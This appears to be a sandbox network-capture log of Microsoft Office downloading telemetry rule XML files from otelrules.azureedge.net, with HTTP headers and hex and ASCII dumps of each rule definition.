                                                                                                                  2024-11-14 14:00:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  120192.168.2.44989813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 405
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                  ETag: "0x8DC582B942B6AFF"
                                                                                                                  x-ms-request-id: e1e5caf7-d01e-00ad-6fa7-34e942000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-r178fb8d765mjvjchC1DFWhkyn00000002hg0000000050rn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  121192.168.2.44989913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                  ETag: "0x8DC582BBA642BF4"
                                                                                                                  x-ms-request-id: 46cd4d21-b01e-0097-7b90-364f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7fdtmzhhC1DFW6zhc00000007q0000000004cat
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  122192.168.2.44990213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 174
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                  ETag: "0x8DC582B91D80E15"
                                                                                                                  x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f7scqbhC1DFW0m5w0000000kn000000000730u
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  123192.168.2.44990313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC515INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1952
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                  ETag: "0x8DC582B956B0F3D"
                                                                                                                  x-ms-request-id: 05e9aefb-801e-00ac-4740-36fd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7fm7xw6hC1DFW5px40000000kk000000000g92h
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  124192.168.2.44990413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 958
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                  ETag: "0x8DC582BA0A31B3B"
                                                                                                                  x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-16547b76f7fx6rhxhC1DFW76kg0000000km000000000kps2
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  125192.168.2.44990513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 501
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                  ETag: "0x8DC582BACFDAACD"
                                                                                                                  x-ms-request-id: d4c521ce-601e-000d-6da3-342618000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-r178fb8d765d5f82hC1DFWsrm800000002s00000000094ch
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  126192.168.2.44990613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2592
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                  ETag: "0x8DC582BB5B890DB"
                                                                                                                  x-ms-request-id: 1b1efdea-801e-00ac-68a8-34fd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000dtqc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  127192.168.2.44990913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 3342
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                  ETag: "0x8DC582B927E47E9"
                                                                                                                  x-ms-request-id: 88f0b540-e01e-0033-5da0-344695000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbddrtrhhC1DFWsq8000000002q00000000099vu
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  128192.168.2.44991013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2284
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                  ETag: "0x8DC582BCD58BEEE"
                                                                                                                  x-ms-request-id: 3863d8d3-f01e-0099-536f-359171000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbdwv5sghC1DFWwp6n00000002h0000000005t5f
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  129192.168.2.44991213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1356
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                  ETag: "0x8DC582BDC681E17"
                                                                                                                  x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-16547b76f7fdtmzhhC1DFW6zhc00000007q0000000004ce9
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
